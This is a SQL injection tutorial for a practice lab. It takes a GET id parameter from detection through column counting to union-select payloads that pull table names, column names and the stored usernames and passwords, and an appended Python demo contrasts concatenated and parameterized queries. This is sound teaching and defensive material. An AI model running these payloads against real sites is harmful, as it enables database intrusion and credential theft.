Principle
SQL injection is a form of attack in which malicious code is inserted into a string that is later passed to SQL Server for parsing and execution. Any procedure that constructs SQL statements should be checked for injection vulnerabilities, because SQL Server will execute every syntactically valid query it receives.
(From Microsoft's description of SQL injection. Note, however, that SQL injection is not limited to SQL Server; almost every database engine has this problem.)
General steps
1. Determine the injection point
Determining the injection point means two things: first, finding the location where injection may exist; second, judging whether injection can actually be carried out there. In the lab environment we already know that the GET parameter id is the point that interacts with the database, so next we judge whether it can be injected.
id = 1: the query succeeds and the page echoes normally.
id = 1': the database reports an error; from the error message we guess that the value is enclosed in single quotes.
id = 1' --+: the query succeeds and the page echoes normally, confirming the guess.
id = 1' and 1=1 --+ and then id = 1' and 1=2--+: from the echo in each case we further judge whether injection is possible.
1=1 is always true, so if the query with id 1 succeeded, the query with 1=1 also succeeds and the page returns normally. 1=2 is always false, so if the 1=2 condition is actually executed, the page must return abnormally. Comparing the two results shows whether this point can be injected.
2. Determine the number of query fields
To display the results we want on the page, we need to use a union query. One requirement of a union query is that the number of fields in the preceding and following query statements must be equal, so we need to determine the number of fields in the original query.
Generally order by or union select is used, as follows:
With order by greater than 3 the page does not return normally, while less than or equal to 3 returns normally, so the number of fields in the original query statement is 3. Alternatively:
When we union-select 4 columns, we get the error that the SELECT statements have a different number of columns; when we query 3 columns:
The query succeeds, so the original query statement has only three columns.
3. Look up the database name, version number, user name and other information
The rule of a union query is that when the first query yields no result, what is displayed comes from the second query. Since we learned earlier that the query has three fields, we next set id to 0 and determine which of the three fields are echoed on the page.
Using the database's built-in functions version(), database() and user(), we find the version number, the current database name and the current user.
4. Query the table names
From the previous query we learned that the current database version is 5.5.53. MySQL 5.5 and later versions have the built-in information_schema database, which stores the names of all tables, fields and other metadata in the database. Query statements can therefore be constructed to obtain the table names.
payload:?id=0' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3--+
Here group_concat() is a built-in SQL aggregate function used to output the query result as a single string.
(To list all database names, use the payload: ?id=0' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+ )
5. Query the field names
Knowing all the table names, we next select a table and query all its field names.
payload:?id=0' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3--+
6. Query the record contents
With the table name and the field names, the records in the database can be revealed.
payload:?id=0' union select 1,group_concat(username),group_concat(password) from users --+
The above is the general SQL injection process. Other techniques such as error-based injection, request-header injection and writing a one-line webshell with select into outfile are not introduced here; they will be added gradually in the course of later study.
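As an added example (not from the original post), the following Python script builds an in-memory SQLite table standing in for the lab's users table and contrasts the quote-and-concatenate query that the steps above exploit with a parameterized version, feeding both the same test values the page uses. The table contents, function names and the integer-only input check are constructed for this demonstration, SQLite replaces MySQL (so error messages differ), and the page's "--+" is written as "-- " because the "+" is a URL-encoded space.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the lab's `users` table (sample rows, not the lab's)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "pw1"), (2, "bob", "pw2")])
    return conn


def vulnerable_lookup(conn, user_id):
    """The pattern the page attacks: the id is wrapped in single quotes and spliced
    into the SQL text, so a stray quote, `and 1=2` or `union select` becomes syntax.
    Returns the rows, or None when the database reports a syntax/union error
    (the page's 'database error' echo)."""
    sql = f"SELECT username, password FROM users WHERE id='{user_id}' LIMIT 1"
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.OperationalError:
        return None


def safe_lookup(conn, user_id):
    """Parameterized query: the value is bound separately and can never alter the
    statement's structure, so every payload is compared as a literal string."""
    sql = "SELECT username, password FROM users WHERE id=? LIMIT 1"
    return conn.execute(sql, (user_id,)).fetchall()


def looks_injected(user_id):
    """Cheap defensive check (hypothetical) for a parameter that should only ever be an
    integer; usable as a WAF or log-alert rule, not a substitute for parameterization."""
    return not user_id.isdigit()


if __name__ == "__main__":
    conn = make_db()
    for payload in ["1", "1'", "1' -- ", "1' and 1=1 -- ", "1' and 1=2 -- ",
                    "0' union select 1,2,3 -- ", "0' union select 1,2 -- "]:
        print(repr(payload), "vulnerable:", vulnerable_lookup(conn, payload),
              "safe:", safe_lookup(conn, payload), "flagged:", looks_injected(payload))
```

The vulnerable path reproduces every echo the page describes (normal, error, true/false difference, union column-count error), while the parameterized path returns the same empty result for all of them.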